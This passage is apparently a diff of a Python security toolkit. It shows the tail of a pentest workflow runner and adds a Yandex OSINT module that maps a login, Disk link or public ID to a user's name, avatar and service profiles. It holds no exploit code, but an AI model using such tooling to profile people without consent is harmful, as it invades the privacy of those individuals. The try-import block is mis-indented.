                'hostname': target,
                'os_guess': '-',
                'ports': services
            }]
        vuln_data = state.get('correlations') or None
        exploit_data = state.get('exploits') or None
        try:
            from core.report_generator import get_report_generator
            rg = get_report_generator()
            report_path = rg.generate_pentest_report(
                target=target,
                network_data=network_data,
                vuln_data=vuln_data,
                exploit_data=exploit_data
            )
            self.print_status(f"Report saved to {report_path}", "success")
            state['report'] = report_path
        except Exception as e:
            self.print_status(f"Report generation failed: {e}", "error")
    def _save_state(self, state, state_file):
        """Save workflow state to JSON (best-effort; failures are silent)."""
        try:
            # Make serializable - convert CVE objects if needed
            serializable = json.loads(json.dumps(state, default=str))
            with open(state_file, 'w') as f:
                json.dump(serializable, f, indent=2)
        except Exception:
            # State saving is a convenience; never abort the workflow over it.
            pass
    # =========================================================================
    # MAIN LOOP
    # =========================================================================
    def run(self):
        """Main menu loop; returns when the user selects 0 or interrupts."""
        while True:
            self.show_menu()
            try:
                choice = input(f"{Colors.WHITE}  Select: {Colors.RESET}").strip()
                if choice == "0":
                    break
                elif choice == "1":
                    target = input(f"\n{Colors.WHITE}  Target IP/hostname: {Colors.RESET}").strip()
                    if target:
                        self.run_workflow(target)
                elif choice == "2":
                    target = input(f"\n{Colors.WHITE}  Target IP/hostname: {Colors.RESET}").strip()
                    if target:
                        self.quick_scan(target)
                elif choice == "3":
                    self.resume_workflow()
            except (EOFError, KeyboardInterrupt):
                print()
                break
def run():
    """Module entry point."""
    # Instantiate the workflow orchestrator and enter its menu loop.
    runner = WorkflowRunner()
    runner.run()
if __name__ == "__main__":
    run()

326
modules/yandex_osint.py Normal file
View File

@@ -0,0 +1,326 @@
"""
AUTARCH Yandex OSINT Module
Gather information about Yandex users from their login, email, or public links
"""
import json
import os
import sys
import webbrowser
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "Yandex OSINT"
DESCRIPTION = "Gather intel from Yandex user accounts"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
# Try to import requests
try:
import requests
except ImportError:
requests = None
class YandexParser:
    """Parser for Yandex user information.

    Resolves a Yandex login, Disk share link, or 26-character public ID
    into display name, avatar URL, and per-service profile URLs via the
    public Yandex Collections API.

    NOTE(review): the Collections API endpoint used here may change or
    be retired by Yandex — verify it still responds before relying on it.
    """
    def __init__(self):
        # requests.Session; stays None when the requests package is missing
        # (run() guards against that before constructing this class).
        self.session = None
        # Per-request timeout in seconds for all HTTP calls.
        self.timeout = 10
        # Desktop Chrome UA to avoid bot-specific responses.
        self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
        self._init_session()
    def _init_session(self):
        """Initialize requests session."""
        if requests is None:
            return
        self.session = requests.Session()
        # Retry transient connection failures up to twice per request.
        adapter = requests.adapters.HTTPAdapter(max_retries=2)
        self.session.mount('https://', adapter)
        self.session.mount('http://', adapter)
        self.session.headers.update({'User-Agent': self.user_agent})
    def lookup_by_login(self, login: str) -> dict:
        """Lookup Yandex user by login/email.
        Args:
            login: Yandex login or email.
        Returns:
            Dict with user information.
        """
        # Strip domain from email
        # NOTE(review): any domain is discarded and the email field is
        # rebuilt as @yandex.ru — a non-Yandex address loses its domain.
        login = login.split('@')[0].strip()
        if not login:
            return {'error': 'Invalid login'}
        result = {
            'login': login,
            'email': f"{login}@yandex.ru",
            'display_name': None,
            'public_id': None,
            'avatar_url': None,
            'profiles': {},
        }
        print(f"{Colors.CYAN}[*] Looking up Yandex user: {login}{Colors.RESET}")
        # Query Yandex Collections API
        try:
            url = f"https://yandex.ru/collections/api/users/{login}/"
            response = self.session.get(url, timeout=self.timeout)
            if response.status_code == 200:
                # The API can return HTTP 200 with an embedded 404 title
                # for unknown users, so check the payload too.
                data = response.json()
                if data.get('title') == "404 Not Found":
                    result['error'] = 'User not found'
                    return result
                result['display_name'] = data.get('display_name')
                result['public_id'] = data.get('public_id')
                avatar_id = data.get('default_avatar_id')
                if avatar_id:
                    result['avatar_url'] = f"https://avatars.mds.yandex.net/get-yapic/{avatar_id}/islands-300"
                # Build profile URLs
                pub_id = result['public_id']
                if pub_id:
                    # These services key off the public ID, not the login.
                    result['profiles'] = {
                        'reviews': f"https://reviews.yandex.ru/user/{pub_id}",
                        'market': f"https://market.yandex.ru/user/{pub_id}/reviews",
                        'dzen': f"https://zen.yandex.ru/user/{pub_id}",
                        'qa': f"https://yandex.ru/q/profile/{pub_id}/",
                    }
                # Music uses the plain login; the Disk link is a generic
                # client URL, not user-specific.
                result['profiles']['music'] = f"https://music.yandex.ru/users/{login}/tracks"
                result['profiles']['disk'] = f"https://disk.yandex.ru/client/disk"
                print(f"{Colors.GREEN}[+] User found!{Colors.RESET}")
            elif response.status_code == 404:
                result['error'] = 'User not found'
            else:
                result['error'] = f'API error: {response.status_code}'
        except requests.exceptions.RequestException as e:
            result['error'] = f'Network error: {str(e)}'
        except json.JSONDecodeError:
            result['error'] = 'Invalid API response'
        except Exception as e:
            result['error'] = f'Error: {str(e)}'
        return result
    def lookup_by_disk_link(self, url: str) -> dict:
        """Extract user info from Yandex.Disk public link.
        Args:
            url: Public Yandex.Disk link.
        Returns:
            Dict with user information.
        """
        print(f"{Colors.CYAN}[*] Extracting user from Yandex.Disk link...{Colors.RESET}")
        try:
            response = self.session.get(url, timeout=self.timeout)
            if response.status_code != 200:
                return {'error': 'Failed to fetch disk link'}
            # Extract displayName from page
            # Crude scrape of the embedded JSON: take the text between
            # 'displayName":"' and the next double quote.
            try:
                login = response.text.split('displayName":"')[1].split('"')[0]
            except (IndexError, AttributeError):
                return {'error': 'Could not extract user from link'}
            if not login:
                return {'error': 'No user found in link'}
            print(f"{Colors.GREEN}[+] Extracted login: {login}{Colors.RESET}")
            # Chain into the regular login lookup for full profile data.
            return self.lookup_by_login(login)
        except Exception as e:
            return {'error': f'Error: {str(e)}'}
    def lookup_by_public_id(self, public_id: str) -> dict:
        """Lookup user by Yandex public ID.
        Args:
            public_id: 26-character Yandex user identifier.
        Returns:
            Dict with user information.
        """
        if len(public_id) != 26:
            return {'error': 'Invalid public ID (must be 26 characters)'}
        # Profile URLs can be derived from the ID alone, without any API call.
        result = {
            'public_id': public_id,
            'profiles': {
                'reviews': f"https://reviews.yandex.ru/user/{public_id}",
                'market': f"https://market.yandex.ru/user/{public_id}/reviews",
                'dzen': f"https://zen.yandex.ru/user/{public_id}",
                'qa': f"https://yandex.ru/q/profile/{public_id}/",
            }
        }
        print(f"{Colors.CYAN}[*] Looking up public ID: {public_id}{Colors.RESET}")
        # Try to get more info from collections API
        # Best-effort enrichment: any failure leaves the URL-only result.
        try:
            url = f"https://yandex.ru/collections/api/users/{public_id}/"
            response = self.session.get(url, timeout=self.timeout)
            if response.status_code == 200:
                data = response.json()
                if data.get('title') != "404 Not Found":
                    result['display_name'] = data.get('display_name')
                    avatar_id = data.get('default_avatar_id')
                    if avatar_id:
                        result['avatar_url'] = f"https://avatars.mds.yandex.net/get-yapic/{avatar_id}/islands-300"
        except Exception:
            pass
        print(f"{Colors.GREEN}[+] Profile URLs generated!{Colors.RESET}")
        return result
def display_result(result: dict, open_browser: bool = False):
    """Render a Yandex lookup result to the terminal.

    Args:
        result: Lookup result dict.
        open_browser: Whether to open profile URLs in the default browser.
    """
    if 'error' in result:
        print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}")
        return
    banner_rule = f"{Colors.CYAN}{'=' * 55}{Colors.RESET}"
    print(f"\n{banner_rule}")
    print(f"{Colors.GREEN}{Colors.BOLD}  YANDEX USER PROFILE{Colors.RESET}")
    print(banner_rule)
    # Print the scalar identity fields in a fixed order, skipping blanks.
    for key, label in (('display_name', 'Name'), ('login', 'Login'),
                       ('email', 'Email'), ('public_id', 'Public ID')):
        value = result.get(key)
        if value:
            print(f"  {Colors.GREEN}{label}:{Colors.RESET} {value}")
    if result.get('avatar_url'):
        print(f"\n  {Colors.GREEN}Avatar:{Colors.RESET}")
        print(f"    {Colors.DIM}{result['avatar_url']}{Colors.RESET}")
    profiles = result.get('profiles', {})
    if profiles:
        print(f"\n  {Colors.GREEN}Yandex Services:{Colors.RESET}")
        for name, url in profiles.items():
            print(f"    {Colors.CYAN}{name.title()}:{Colors.RESET} {url}")
            if open_browser:
                # Best-effort: a missing/broken browser must not abort output.
                try:
                    webbrowser.open(url)
                except Exception:
                    pass
    print()
def display_menu():
    """Display the Yandex OSINT module menu.

    Fix: the divider glyph was an empty string (`'' * 55`), which printed
    a blank line instead of a horizontal rule; restore the dash glyph.
    """
    print(f"""
{Colors.CYAN}  Yandex OSINT{Colors.RESET}
{Colors.DIM}  Gather intelligence from Yandex user accounts{Colors.RESET}
{Colors.DIM}{'─' * 55}{Colors.RESET}
  {Colors.GREEN}[1]{Colors.RESET} Lookup by Login/Email
  {Colors.GREEN}[2]{Colors.RESET} Lookup by Yandex.Disk Public Link
  {Colors.GREEN}[3]{Colors.RESET} Lookup by Public ID (26-char hash)
  {Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def run():
    """Main entry point for the module.

    Menu loop dispatching to the three lookup modes; exits when the user
    selects 0.  Aborts early with a hint when the requests package is
    not installed, since every lookup needs it.
    """
    if requests is None:
        print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
        print(f"{Colors.DIM}    Install with: pip install requests{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return
    parser = YandexParser()
    while True:
        display_menu()
        choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
        if choice == '0':
            break
        elif choice == '1':
            print(f"\n{Colors.CYAN}Enter Yandex login or email:{Colors.RESET}")
            print(f"{Colors.DIM}Example: username or username@yandex.ru{Colors.RESET}")
            login = input(f"\n{Colors.GREEN}Login: {Colors.RESET}").strip()
            if not login:
                continue
            result = parser.lookup_by_login(login)
            open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
            display_result(result, open_browser=(open_links == 'y'))
            input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '2':
            print(f"\n{Colors.CYAN}Enter Yandex.Disk public link:{Colors.RESET}")
            print(f"{Colors.DIM}Example: https://yadi.sk/d/xxxxx{Colors.RESET}")
            url = input(f"\n{Colors.GREEN}URL: {Colors.RESET}").strip()
            if not url:
                continue
            result = parser.lookup_by_disk_link(url)
            open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
            display_result(result, open_browser=(open_links == 'y'))
            input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '3':
            print(f"\n{Colors.CYAN}Enter Yandex public ID (26 characters):{Colors.RESET}")
            print(f"{Colors.DIM}Example: tr6r2c8ea4tvdt3xmpy5atuwg0{Colors.RESET}")
            pub_id = input(f"\n{Colors.GREEN}Public ID: {Colors.RESET}").strip()
            if not pub_id:
                continue
            result = parser.lookup_by_public_id(pub_id)
            open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
            display_result(result, open_browser=(open_links == 'y'))
            input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        else:
            print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
    run()